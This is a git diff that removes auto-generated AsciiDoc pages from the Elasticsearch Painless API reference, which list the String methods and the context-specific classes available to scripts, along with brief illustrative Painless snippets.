- -[[painless-api-reference-ingest-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String sha1() -* String sha256() -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-ingest-org-elasticsearch-ingest-common"] -=== Ingest API for package org.elasticsearch.ingest.common -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-ingest-Processors]] -==== Processors -* static long bytes(String) -* static Object json(Object) -* static void json(Map, String) -* static String lowercase(String) -* static String uppercase(String) -* static String urlDecode(String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-interval/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-interval/index.asciidoc deleted file mode 100644 index a967992d786..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-interval/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-interval]] -=== Interval API - -The following specialized API is available in the Interval context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. 
- - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-interval/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-interval/packages.asciidoc deleted file mode 100644 index c33acf7a257..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-interval/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-interval-java-lang"] -=== Interval API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-interval-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-moving-function/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-moving-function/index.asciidoc deleted file mode 100644 index ee7ebe2ed26..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-moving-function/index.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-moving-function]] -=== Moving Function API - -The following specialized API is available in the Moving Function context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. 
- - -==== java.lang -<> - -* <> - -==== org.elasticsearch.search.aggregations.pipeline -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-moving-function/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-moving-function/packages.asciidoc deleted file mode 100644 index a30c9fc6935..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-moving-function/packages.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-moving-function-java-lang"] -=== Moving Function API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-moving-function-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int 
{java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-moving-function-org-elasticsearch-search-aggregations-pipeline"] -=== Moving Function API for package org.elasticsearch.search.aggregations.pipeline -See the <> for a high-level overview of all packages and classes. 
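A minimal sketch of a `moving_fn` pipeline aggregation script using the `MovingFunctions` helper detailed below. The `values` binding (a `double[]` window of bucket values) is assumed to be provided by the context rather than by this listing.

[source,painless]
----
// Average the current window, guarding against an empty window.
// `values` is assumed to be the double[] bound by the Moving Function context.
if (values.length == 0) {
  return 0.0;
}
return MovingFunctions.unweightedAvg(values);
----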
- -[[painless-api-reference-moving-function-MovingFunctions]] -==== MovingFunctions -* static double ewma(double[], double) -* static double holt(double[], double, double) -* static double holtWinters(double[], double, double, double, int, boolean) -* static double linearWeightedAvg(double[]) -* static double max(double[]) -* static double min(double[]) -* static double stdDev(double[], double) -* static double sum(double[]) -* static double unweightedAvg(double[]) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-number-sort/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-number-sort/index.asciidoc deleted file mode 100644 index a91a6af5f84..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-number-sort/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-number-sort]] -=== Number Sort API - -The following specialized API is available in the Number Sort context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-number-sort/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-number-sort/packages.asciidoc deleted file mode 100644 index 20157333a08..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-number-sort/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-number-sort-java-lang"] -=== Number Sort API for package java.lang -See the <> for a high-level overview of all packages and classes. 
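For orientation, a hedged sketch of the kind of expression a Number Sort script usually returns: a single numeric value per document. The `doc` and `params` bindings come from the shared API, not from this listing, and the field and parameter names are hypothetical.

[source,painless]
----
// Sort key: a document field scaled by a request-supplied factor.
// `doc` and `params` are assumed from the shared API; the names are made up.
doc['price'].value * params['conversion_rate']
----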
- -[[painless-api-reference-number-sort-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-number-sort-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Number Sort API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-number-sort-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-number-sort-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Number Sort API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-number-sort-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-number-sort-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-painless-test/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-painless-test/index.asciidoc deleted file mode 100644 index 5ceee2904be..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-painless-test/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-painless-test]] -=== Painless Test API - -The following specialized API is available in the Painless Test context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-painless-test/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-painless-test/packages.asciidoc deleted file mode 100644 index ee58588b3ff..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-painless-test/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-painless-test-java-lang"] -=== Painless Test API for package java.lang -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-painless-test-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* 